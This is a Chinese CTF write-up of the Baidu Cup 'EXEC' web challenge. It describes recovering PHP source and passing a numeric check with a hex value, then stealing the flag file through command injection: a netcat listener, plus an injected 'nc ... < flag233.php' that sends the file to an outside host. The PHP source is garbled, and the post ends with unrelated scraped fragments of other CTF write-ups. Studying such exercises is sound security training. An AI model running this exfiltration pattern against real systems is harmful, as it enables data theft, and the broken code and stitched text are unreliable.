i春秋 百度杯十月場 EXEC

2021-10-01 08:57:29 字數 551 閱讀 8906

用 vim -r 命令恢復檔案,得到原始碼:

<?php

/*flag in flag233.php

*/function check($number)

);if ( ($digit >= $one) && ($digit <= $nine) )

}return $number == '11259375';

}if(isset($_get[sign])&& check($_get[sign]))

}else

?>

**的意思大致是,引數sign必須是11259375,而且每一位的值的ascii碼不能大於1或小於9,只能試試16進製制了,成功繞過。

但是沒有echo,就算命令執行了也沒有結果返回,沒頭緒,參考了下別人的,哈哈。

最後,學到了nc 命令,以前看ctf題都不知道裡邊的nc是幹啥用的,學到了學到了。

伺服器上執行,nc -u -l -p 55566

然後,cmd=nc -u ip位址 55566 < flag233.php

「百度杯」CTF比賽 十月場 登入

這題的sql注入也確實是讓自己漲姿勢了。自己可以說學了mysql就沒有用過like,一直以為它在sql注入裡沒用,沒想到居然可以這樣。進入環境,是乙個登入頁面。嘗試進行sql注入,發現username為admin or 1 1 的時候顯示密碼錯誤,username為admin or 1 2 的時候顯...

i春秋「百度杯」二月第二場Web專題

檢視原始碼,得知限制了只允許數字字母下劃線 利用超全域性變數 很明顯的 注入 獲得flag session nums需要 10返回flag 初始化為0 其中substr md5 value 5,4 0是恆成立的 只要滿足whoami 等於就會 對nums加1 whoami初始化為ea 並且加一的同時...

百度杯 九月場 再見CMS writeup

1.第一步,肯定是要判斷出cms型別 2.第二步,查詢該cms曾經出現的漏洞 3.第三步,然後利用這些漏洞拿到flag.關於查漏洞這件事,可以利用烏雲映象等安全 乙個可以利用的漏洞是 根據漏洞構造這樣乙個注入語句,判斷能否注入 post資料 truename x 0000 limitword 000...